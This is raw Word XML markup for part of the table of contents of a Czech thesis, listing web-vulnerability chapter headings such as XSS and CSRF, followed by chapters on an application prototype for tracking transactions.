          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327882 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>88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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zranitelná autentizace nebo správa relace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327883 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>88</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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Cross-Site Scripting (XSS)</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327884 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>89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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Nezabezpečená přímá reference objektů a kontrola oprávnění</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327885 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>89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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.5</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Špatná konfigurace zabezpečení</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327886 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>89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7" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.6</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Únik citlivých dat</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327887 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.7</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Coss-Site Request Forgery (CSRF)</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327888 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>90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89" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.8</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Komponenty se známými zranitelnostmi</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327889 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</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90" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.9</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Neověřené přesměrování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327890 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</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891" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Prototyp aplikace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327891 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Registrace uživatele a přihlášení</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327892 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Vytvoření účtů</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327893 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>92</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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Evidence transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327894 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>93</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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zobrazení statistik</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327895 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>95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96" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8.4.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Filtrování transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327896 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="004D2639">
      <w:pPr>
        <w:pStyle w:val="Obsah4"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc387327897" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8.4.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Grafy</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327897 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8.5</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Změna hesla a odhlášení</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327898 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>98</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="004D2639">
      <w:pPr>
        <w:pStyle w:val="Obsah3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc387327899" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>8.6</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Celkový dojem uživatelů</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327899 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</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0" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Další rozvoj aplikace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327900 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>100</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1" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Závěr</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
